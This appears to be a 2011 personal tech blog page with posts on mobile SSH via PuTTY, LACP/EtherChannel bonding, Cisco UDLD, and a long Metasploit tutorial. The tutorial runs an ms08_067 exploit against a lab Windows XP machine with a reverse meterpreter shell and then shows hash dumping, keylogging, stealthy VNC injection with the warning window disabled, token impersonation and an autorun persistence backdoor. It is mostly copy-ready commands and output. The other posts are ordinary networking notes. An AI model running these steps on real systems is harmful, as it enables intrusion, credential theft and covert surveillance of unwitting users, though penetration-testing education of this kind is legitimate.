Thursday, March 31, 2011

SSH connection using PuTTY Touch UI on Nokia 5233 (Symbian OS 9.4)

Hey Guys, Ever felt the need to do some CLI awesomeness on Linux when you are on the move & got connectivity through Wi-Fi Hotspot or through GPRS/EDGE/3G on your symbian mobile I got a solution for ya.
Our favorite SSH client for Windows PuTTY is here to save us on the Symbian Platform also. I am using PuTTY Touch UI 1.06 (0.8.8) version here for the Nokia 5233 mobile I got. Nokia 5233 is a decent phone for the price having really nice Touch interface. Nokia 5233 does not have Wi-Fi capability so I am using my service providers GPRS here which is quite sluggish but enough for the SSH connection.
The Touch interface in the PuTTY is good for quick operations. The app is really good and not resource hungry.
Just one thing you cannot multi-task while your SSH connection is established.
Follow some of the screenshots from my mobile SSH'ed into my Laptop connected through wireless-card with SSH port 22 open for Public connection.
So as you can see I can run Metasploit and do dome penetration testing on the fly with the SSH connection from my Mobile to Linux Box sitting at home. The Linux Box is connected to the Internet by Huge Pipe so that the Bandwidth will not be a problem. Believe me guys GPRS connection is much sufficient for SSH connection to the Linux Box & from there I can do whatever I want.
Now I can reach to my Linux box from almost anywhere through SSH.
SSH to different ports is also supported in the application. Advance Logging features are also present there for logs residing in the Mobile phone including the RAW SSH traffic or the Printable output.
A random thought just came into my mind, If we can do the port forwarding in the application on the Symbian OS so that all the traffic will be tunneled to the Linux box through SSH then that would be the more secure connection as the complete traffic from mobile to the Linux Box is encrypted reducing the Service Provider level threats.
Telnet though is not possible from this version of PuTTY. SSHv1 or SSHv2 can be done.
Private key can also be forwarded. Keep-alive intervals also can be configured. Please explore more guys and let me know what you think about this.





Saturday, March 26, 2011

LACP/Etherchannel Algorithms & Linux Bonding Modes.

The LACP Mode in Enterasys or the Port-channel mode in Cisco, have their own algorithms for the priority selection for the slave interfaces involved in the bonding.
As I am a Linux Guy I am more familiar with the Bonding in Linux envoirnment.
we can create bonding in the /etc/sysconfig/network/ifcfg-bond0,here we can define the Master Interface with the IP address and then the slave interfaces involved in the bonding process along with the Mode of the Bonding.
The Switch connected for the bonding also has it's own aggregation algorithm present which must match the with the mode set in the server.
There are 7 modes present in the Linux kernel.

Refer to the Bonding Documentation in the Linux Kernel, it will be available at the path
cat /usr/src/linux-2.6.38/Documentation/networking/bonding.txt | less

More verbose information can be found at
http://www.linuxfoundation.org/collaborate/workgroups/networking/bonding

Enterasys :
In Enterasys Switches such as N-series, the LACP Lag output Algorithm can be set for the 3 modes
DIP-SIP - Destination IP address/Source IP Address, slave interfaces are assigned on the basis of Source or Destination IP Addresses.
DA-SA - Destination MAC Addess/Source Mac Address, slave interfaces are assigned on the basis of Source or Destination MAC Addresses.
Round-Robin - Equal distribtution from the first slave to all slaves in round-robin fashion

To check for the LACP algorithm use following on the Enterasys Switch
Matrix N3 Platinum(su)->sh lacp ?
Specifies the lag port(s) to display
outportAlgorithm Shows lacp current ouport algorithm
flowRegeneration Shows lacp flow regeneration state
singleportlag Show single port lag setting
state Show global lag enable state
Matrix N3 Platinum(su)->sh lacp outportAlgorithm
dip-sip
Matrix N3 Platinum(su)->

To set the LACP outputalgorithm to different mode
Matrix N3 Platinum(su)->set lacp outportAlgorithm ?
dip-sip Use sip-dip algorithm for outport determination
da-sa Use da-sa algorithm for outport determination
round-robin Use round-robin algorithm for outport determination
Matrix N3 Platinum(su)->set lacp outportAlgorithm round-robin
Matrix N3 Platinum(su)->

Hence in accordance with the Mode set on the switch we can set the mode in the Linux
After doing this the LAG groups present will use the round-robin algorithm for flow distrbution.
Remember this is the global configuration which will cause change in algorithm of all LAG ports present.
By default the dip-sip algorithm is configured in the Enterasys switches.

Cisco :
On the Cisco Catalyst Switches, the port-channel can be used in LACP mode for the operation.
The default Load-balancing method used is src-mac (Source MAC Address).
Cisco allows us to perform the dry-run of the algoritm implemented using the test command.
I have all interfaces configured in the LACP Mode (Not in PAgP).

To check what is the current algorithm
Cisco#sh etherchannel load-balance
EtherChannel Load-Balancing Configuration:
src-mac
EtherChannel Load-Balancing Addresses Used Per-Protocol:
Non-IP: Source MAC address
IPv4: Source MAC address
IPv6: Source MAC address
Cisco#

To test the Etherchannel Algorithm used
Cisco#test etherchannel load-balance interface port-channel 1 mac 00:18:17:F1:F9:C4 E4:9F:16:C5:11:56
Would select Gi1/0/1 of Po1
Cisco#

In IP based we can use the IP address to test the etherchannel.
To see the Ether-channel algorithm present
Cisco(config)#port-channel load-balance ?
dst-ip Dst IP Addr
dst-mac Dst Mac Addr
src-dst-ip Src XOR Dst IP Addr
src-dst-mac Src XOR Dst Mac Addr
src-ip Src IP Addr
src-mac Src Mac Addr
Cisco(config)#port-channel load-balance

Here we can see that there is the src-dst-ip & src-dst-mac which are used for inducing additional randomization using the XOR logical operation present.
Hence the load-balancing can be done using the Destination IP address or Source IP address, same goes for the MAC addresses.

To set the New Algorithm
Cisco(config)#port-channel load-balance dst-mac
Cisco(config)#

Now the Load-balancing will happen through the Destination-Mac Address.I will do some more research on this and update the post.

Tuesday, March 22, 2011

Metasploit - 101 with Meterpreter Payload & VNC Injection

The Metasploit framework is well known in the realm of exploit development. It is a standalone tool for security researchers, penetration testers and IDS/IPS developers. As of now, it has 640 exploit definitions and 215 payloads for injection—a huge database. This article focuses on advanced features of the Metasploit framework.


The vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability used here is ms08_067_netapi (just for demonstration purposes; any vulnerability, including Web-based exploits, can be used here to gain shell access to the system). I am running XP SP3 as a virtual machine under Oracle VirtualBox 4.0.


101 with Meterpreter payload


The Meta-Interpreter payload is quite a useful payload provided by Metasploit. It can do a lot of things on the target system. It can be injected as follows.


The Windows target system IP address is 192.168.56.101, and the host OS is Ubuntu 9.10 with the IP address of 192.168.56.1. Hence, RHOST is set to 192.168.56.101 and LHOST to 192.168.56.1.The reverse_tcp type payload of Meterpreter will throw back the shell to the host system. The Meterpreter session will open after the successful exploitation.


Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name          Current Setting        Required        Description
-------       ------------------              -----------          --------------
RHOST                                           yes                  The target address
RPORT        445                            yes                  Set the SMB service port
SMBPIPE  BROWSER                yes                  The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name          Current Setting         Required        Description
-------            ------------------              -----------        --------------
EXITFUNC thread                        yes                              Exit technique: seh, thread,process, none
LHOST                                                 yes                              The listen address
LPORT          4444                          yes                              The listen port
Exploit target:
Id  Name
--  ---- ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options:
Name          Current Setting         Required        Description
-------            ------------------              -----------          --------------
RHOST       192.168.56.101        yes                 The target address
RPORT       445                             yes                 Set the SMB service port
SMBPIPE  BROWSER               yes                 The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name          Current Setting         Required        Description
-------            ------------------              -----------          --------------
EXITFUNC             thread                         yes                    Exit technique: seh, thread, process, none
LHOST          192.168.56.1            yes                    The listen address
LPORT          4444                          yes                     The listen port
Exploit target:
Id  Name
--  --------
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >


Important commands in the Meterpreter session


checkvm
Entering this will check whether the target is a virtual machine. This is quite useful in environments where a huge virtual infrastructure is present. Think of it as if the process in the virtual machine implementing OS virtualisation (OpenVZ) has gone bad, giving access to all virtual machines running on that physical server.


Terminal Output :
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >


getcountermeasure
Entering this will get the attack countermeasures deployed at the target system. This is important because there may be a signature-detection system deployed on the target system. This also detects firewall policies and anti-virus software.


Terminal Output :
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]         Domain profile configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]         Exception mode                     = Enable
[*]
[*]         Standard profile configuration (current):
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Disable
[*]         Exception mode                    = Enable
[*]
[*]         Local Area Connection firewall configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >


get_local_subnets
Entering this will give information about the local subnets in which the target system belongs. This is useful to get information about other systems running in the same subnet.


Terminal Output :
meterpreter > run get_local_subnets
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >


get_application_list
Now, this is very cool. It gives us the whole list of applications installed on the target system, with their versions. We can use this to find specific vulnerabilities in the application version, for further exploitation.


Terminal Output :
meterpreter > run get_application_list
Installed Applications
======================
Name                                                            Version
-------                                                              ----------
Adobe AIR                                                    1.5.3.9120
Adobe Flash Player 10 Plugin                              10.0.45.2
Adobe Shockwave Player 11.5                            11.5.7.609
Acrobat.com                                                 2.0.0.0
ImgBurn                                                        2.4.3.0
Mozilla Firefox (3.5.9)                                 3.5.9 (en-US)
Notepad++                                                   5.5
NetBeans IDE 6.7.1                                            6.7.1
Overlook Fing                                                    1.3
TrueCrypt                                                    6.2
Wireshark 1.0.7                                                   1.0.7
WinPcap 4.1.1                                                     4.1.0.1753
Google Toolbar for Internet Explorer        1.0.0
Microsoft .NET Framework 3.0                 3.0.04506.30
Java Auto Updater                                      2.0.2.1
Microsoft .NET Framework 2.0                 2.0.50727
Java(TM) 6 Update 20                                6.0.200
HTTP Analyzer V5.2.1                               5.2.1
Acrobat.com                                                 2.0.0
Java DB 10.4.2.1                                         10.4.2.1
meterpreter >


credcollect
This dumps all the hashes present for the administrator and users. Later on, these hashes can be used to impersonate users, or passwords can be computed by brute-forcing them.


Terminal Output :
meterpreter > run credcollect
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

hashdump
Hashes for all users can also be dumped separately, to gain access, or for privilege escalation.

Terminal Output :
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >

keylogrecorder
This will log all keystrokes made on the target systems to the .msf directory. The payload will live-migrate to the Explorer process displaying the PID of that process, and will start logging the keystrokes. The getpid command can be used to see which process the payload is attached to.
The keystrokes are recorded in a text file in the specified path.

Terminal output :
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >

shell
This will throw back a shell to the host OS. Now we can run whatever we want—having shell access compromises the whole system:

Terminal output :
meterpreter > shell
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >

Other features are also present in the Meterpreter payload, such as the downloading and uploading of files. This can be used to create automated exploit modules with Meterpreter.

Remote VNC injection
Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely, and can have the display thrown back to the host system. Users of the target system user will not notice that their display is being shared, though there is a trick—we have to disable the Metasploit courtesy shell which appears on the target system's display. If the courtesy shell is not disabled, then it will show a blue command prompt window at the time of exploitation, as shown in Figure 1. This can warn the users of the target system, and result in attack detection. After disabling the courtesy shell, it will not display the blue prompt, as you can see in Figure 2. VNC injection can also be used when a user is not logged in; in that case, don't bother to disable the courtesy shell.

VNCviewer must be installed on the host system to see the VNC session thrown by the target system. I have xtightvncviewer installed on my host Ubuntu 9.10. The VNCHOST parameter is set to 127.0.0.1 by default; we have to change it to the interface on the host system IP on which the VNC session will be spawned—i.e., 192.168.56.1.

Terminal Output :
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required        Description
--------    ------------------         -----------          --------------
RHOST                                           yes            The target address
RPORT       445                 yes         Set the SMB service port
SMBPIPE  BROWSER   yes             The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name           Current Setting        Required        Description
--------       ------------------        -----------          --------------
AUTOVNC         true                           yes          Automatically launch VNC viewer if present
EXITFUNC        thread                         yes          Exit technique: seh, thread, process, none
LHOST                                            yes           The listen address
LPORT        4444                         yes           The listen port
VNCHOST        127.0.0.1                    yes            The local host to use for the VNC proxy
VNCPORT         5900                          yes           The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting               Required        Description
--------    ------------------                     -----------          --------------
RHOST       192.168.56.101        yes                  The target address
RPORT       445                             yes                              Set the SMB service port
SMBPIPE  BROWSER               yes                              The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name          Current Setting         Required        Description
--------           ------------------              -----------          --------------
AUTOVNC             true                 yes                              Automatically launch VNC viewer if present
EXITFUNC             thread             yes                              Exit technique: seh, thread, process, none
LHOST                    192.168.56.1 yes                              The listen address
LPORT                    4444               yes                              The listen port
VNCHOST             192.168.56.1 yes                              The local host to use for the VNC proxy
VNCPORT             5900               yes                              The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >

Figure 1: VNCInjection with courtesy shell enabled, by default

Figure 2: VNCInjection with courtesy shell disabled

Please Click on the images for full scale resolutions.


Meterpreter incognito mode
The Incognito extension of the Meterpreter module is used to impersonate user tokens to achieve privilege escalation, and to maintain access to the system. This is used to execute jobs with the access privileges of the impersonated user. We can also get the process list by using the ps command in Meterpreter; and by using the command steal_token <pid> we can also impersonate our privileges to the level of the process initiator. This incognito mode helps us in gaining access to the part of the system that is only accessed by users or administrators with higher privileges than the compromised user.

Terminal output :
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >

Meterpreter persistence mode
The Persistence extension is useful to keep access to the system for further exploitation; it is like planting your own back-door for access to that system later on. The Visual Basic script gets installed on the target system. This script loads auto-runs into the system, which keep on making connections to the host IP that was configured at the time of the first exploitation. After that, every time the user logs in, the script throws a shell back to the configured remote IP.

Terminal Output :
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.56.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >

Persistence parameters

run persistence -U -i 5 -p 443 -r 192.168.56.1
-U = automatically starts a module when the user logs in.
-i = interval between each connection to the remote IP address configured.
-p = port to reach on the remote IP address for Metasploit connection, i.e. the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r = reachable remote IP address to have handler shell.

Moving on, we just need to load the simpler generic handler exploit module, reverse_tcp payload and wait for the Meterpreter shell to appear. This stub exploit provides an interface for handling the exploit connection. At the time of deploying the exploit script, remember to note the clean-up link. This exploit could be dangerous, as it leaves traces on the target system. Be sure to clean it up after exploitation. The script location and registry entries can be cleared when the access to the target system is no longer required.

Terminal Output :
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options:
Name                     Current Setting         Required        Description
--------              ------------------        -----------          --------------
Payload options (windows/meterpreter/reverse_tcp):
Name                      Current Setting         Required        Description
--------                ------------------        -----------          --------------
EXITFUNC             process                             yes       Exit technique: seh, thread, process, none
LHOST                    192.168.56.1             yes       The listen address
LPORT                    443                             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >

That's all for now, but this is just a start to the endless possibilities for exploitation. I will be back soon with more exciting stuff for you guys.

References
http://www.offensive-security.com/metasploit-unleashed/

Note : - This Article is posted by me in the Linux for you Magazine for February 2011 issue. Linux for you is the leading Open-source & Linux magazine in the Asia Region.

Tuesday, March 8, 2011

Cisco UDLD - Unidirectional Link Detection Protocol

Cisco Proprietary Transmit/Receive link failure Detection protocol.
UDLD can be used for both the Fiber Links as well as the Copper Links.
As for Fiber it is obvious that there is no need of loop, because Light as a carrying medium doesn't require closed circuit to operate. Copper i.e. Twisted pair based communication requires loop to operate as the circuit needs to be closed.
It works by sending UDLD packets to a multicast mac-address as destination with it’s own device and port ID encapsulated. If it's doesn't get an echo of it's packet the link is considered unidirectional.
This Protocol is only Point-to-Point Links & not for multi-point environment.
It can detect the single link failure on the Remote end also, when media converters are deployed in between the nodes as the media converters are not able to propagate the fault detection of the Single link failure. The two switches involved in UDLD sends out the UDLD advertisements.

By default, UDLD is disabled on all interfaces. We can enable UDLD on devices as follows.

Switch(config)# interface f0/7
Switch(config-if)# udld port

Also set this on the interface connected to this respective interface on the other switch.
After that, we can check that the local switch interface has detected its neighbor and updated the link's status to bidirectional.

Switch# show udld f0/7
Interface Fa0/7
---
Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Bidirectional
Current operational state: Advertisement - Single neighbor detected
Message interval: 15
Time out interval: 5
Entry 1
---
Expiration time: 40
Device ID: 1
Current neighbor state: Bidirectional
Device name: CAT0746Z1WN
Port ID: Fa0/16
Neighbor echo 1 device: CAT1042NJ69
Neighbor echo 1 port: Fa0
Message interval: 15
Time out interval: 5
CDP Device name: S2

Normal Mode can take 15+5 = 20 seconds to react to the Link fault ( Message interval : 15 Time out Interval : 5 ).
In Normal Mode, link failure detection doesn't put the port into disable state, this results in devices still trying to transmit on faulty links. To overcome this we can use the aggressive mode.
Normal Mode can detect the Fiber mis-connection problem, such as Single Strand broken or not connected.
In aggressive mode, if a link is detected as being unidirectional, that particular interface is placed into the error-disabled state. This state is much more noticeable to administrators.
To enable UDLD in aggressive mode, use following on the both ends of the link.

Switch(config)# interface f0/7
Switch(config-if)# udld port aggressive

We can verify that UDLD is now operating in aggressive mode:

Switch# show udld f0/7
Interface Fa0/13
---
Port enable administrative configuration setting: Enabled / in aggressive mode
Port enable operational state: Enabled / in aggressive mode
Current bidirectional state: Bidirectional
Current operational state: Advertisement - Single neighbor detected
Message interval: 7
Time out interval: 5
Entry 1
---
Expiration time: 43
Device ID: 1
Current neighbor state: Bidirectional
Device name: CAT0746Z1WN
Port ID: Fa0/16
Neighbor echo 1 device: CAT1042NJ69
Neighbor echo 1 port: Fa0/7
Message interval: 15
Time out interval: 5
CDP Device name: S2

The port disabled by the err-disabled condition will show the port status down in show interface command.
After resolving the error condition, we can restore that particular interface to normal operation by using the "no shutdown" and then "shutdown" in the config, or by issuing the command udld reset. This command will reset all the ports made down by udld

Switch# udld reset
1 ports shutdown by UDLD were reset.